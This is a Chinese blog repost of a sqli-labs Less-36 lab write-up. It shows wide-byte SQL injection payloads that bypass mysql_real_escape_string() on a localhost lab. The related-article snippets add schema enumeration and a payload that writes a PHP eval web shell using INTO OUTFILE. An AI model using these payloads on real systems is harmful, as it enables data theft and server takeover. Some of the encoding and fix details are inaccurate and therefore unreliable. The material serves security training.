Sqli-labs less 36

最新推荐文章于 2024-08-11 22:05:00 发布
最新推荐文章于 2024-08-11 22:05:00 发布
阅读量211 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 数据库
原文链接:http://www.cnblogs.com/lcamry/p/5762920.html
本文介绍如何通过特定的payload绕过Less-36关卡中的mysql_real_escape_string()函数过滤,实现SQL注入攻击,并提供两种有效的payload示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Less-36

我们直接看到36关的源代码

上面的check_quotes()函数是利用了mysql_real_escape_string()函数进行的过滤。

mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。

下列字符受影响:

  • \x00
  • \n
  • \r
  • \
  • '
  • "
  • \x1a

如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。

但是因mysql我们并没有设置成gbk,所以mysql_real_escape_string()依旧能够被突破。方法和上述是一样的。

Payload:

http://127.0.0.1/sqli-labs/Less-36/?id=-1%EF%BF%BD%27union%20select%201,user(),3--+

这个我们利用的 ' 的utf-16进行突破的,我们也可以利用%df进行。

Payload:

http://127.0.0.1/sqli-labs/Less-36/?id=-1%df%27union%20select%201,user(),3--+

 

Notice:

在使用mysql_real_escape_string()时,如何能够安全的防护这种问题,需要将mysql设置为gbk即可。

设置代码:

Mysql_set_charset('gbk','$conn')

转载于:https://www.cnblogs.com/lcamry/p/5762920.html

sqli-labs less-26 空格绕过
wanggonghanfei的博客
10-13 1052
sqli-labs less-26 空格绕过
SQL脚本函数 36进制转换为10进制
11-25
一个SQL脚本函数,36进制转换为10进制。36进制指以0、1、2、3、4、5、6、7、8、9、A、B、C、D、E、F、G、H、I、J、K、L、M、N、O、P、Q、R、S、T、U、V、W、X、Y、Z为基数做累加。
sqli-labs(36)
weixin_30301449的博客
06-01 348
0X01发现又是‘’被过滤了 ?id=1%df%27%20and%201=2%23 错误 ?id=1%df%27%20and%201=1%23 正确 存在注入 0X01爆数据库 ?id=-1%df%27%20union%20select%201,database(),3%23 0x02组合拳打法 转载于:https://www.cnblogs.com/-zh...
Sqli-labsLess-36
m0_46315342的博客
06-04 438
                                          &nbs...
sqli-Labs————less-36
Fly_鹏程万里
05-20 617
Less-36源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
下面是基于SQLi-LabsSQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未...
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
sqli-labs/Less-36
m0_71299382的博客
11-21 231
sqli-labs第三十六关
SQLi LABS Less-36 报错注入
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLI第三十六关,SQLI36
sqli-labs (less-36)
kukudeshuo的博客
03-14 453
sqli-labs (less-36) 进入36关,输入id=1 http://127.0.0.1/sql1/Less-36/?id=1' 查看源代码看看这关是否使用了GBK编码 确定使用了GBK编码,使用%df让单引号成功逃逸就可以了 http://127.0.0.1/sql1/Less-36/?id=1%df' 通过错误信息判断闭合方式为’–+,并且为字符型注入 确定回显位置 http://127.0.0.1/sql1/Less-36/?id=-1%df' union select 1,2,
SQLi Labs Lesson36 & Lesson37
1ame的博客
08-30 652
Lesson - 36 GET - Bypass MySQL_real_escape_string 构造 ?id=0%bf%27%20union%20select%201,database(),3--+ Lesson - 37 POST - Bypass MySQL_real_escape_string
sqli-labs 36-65闯关
小龙在线
10-24 445
第三十六关:mysql_real_escape_string宽字符+GET单引号 跟第三十三关基本一致。 ?id=-1%E6' union select 1,2,database() --+ ?id=2&id=-1%E6' union select 1,2,database() --+ ?id=2&id=-1%E6' union select 1,2,group_concat(schema_name) from information_schema.schemata--+ ?id=2&amp
sql-lab (36~40)包括堆叠注入,Mysql_real_escape_string 和addslashes区别(后持续更新)
m0_62879498的博客
01-20 735
(36~40)包括堆叠注入,Mysql_real_escape_string 和addslashes区别 sql-lab-36 和前面的关卡一样,本题对 ’ 进行了注入,我们可以利用以前学过的办法,使用 %df 进行一个绕过。 判断注入点:?id=1 %df’ and 1=2 – q 判断字段数:id=1 %df’ order by 4-- q 判断显错位:?id=-1 %df’ union select 1,2,3-- q 判断库名:?id=-1 %df’ union select 1,datab
[靶场] SQLi-Labs Less28-Less36
3hex的博客
09-26 267
提供主要的语句,略去探测数据库名,表名,字段名的步骤。 31.Less28 请求方式 注入方式 类型 备注 GET 基于报错注入(Union内联注入) 字符型 过滤关键词select、union以及组合,单引号、括号闭合 1. 正常提交 http://127.0.0.1:8003/Less-28/?id=1 2. 语句报错 http://127.0.0.1:8003/Less-28/?id=1 1'2"3 http://127.0.0.1:8003.
LESS-35-36-37-38-39
qq_44598397的博客
04-10 594
LESS-35 由于id没有被单引号括起来所以addslashes起不到作用所以俺正常提交即可。 输入: http://127.0.0.1/sqlilabs/Less-35/?id=-1 and extractvalue(1,concat(0x7e,(select database()),0x7e))–+ less-36 本体的本质和前面相同不过采用的是MySQL_real_escape_stri...
sqli-labs36~38关
weixin_46023655的博客
08-11 514
sqli-labs36~38关
sqli-labs less1
最新发布
03-27
http://example.com/sqli-labs/Less-1/?id=-1' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database() --+ ``` 回显当前数据库的表名(如`emails,users`),再...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值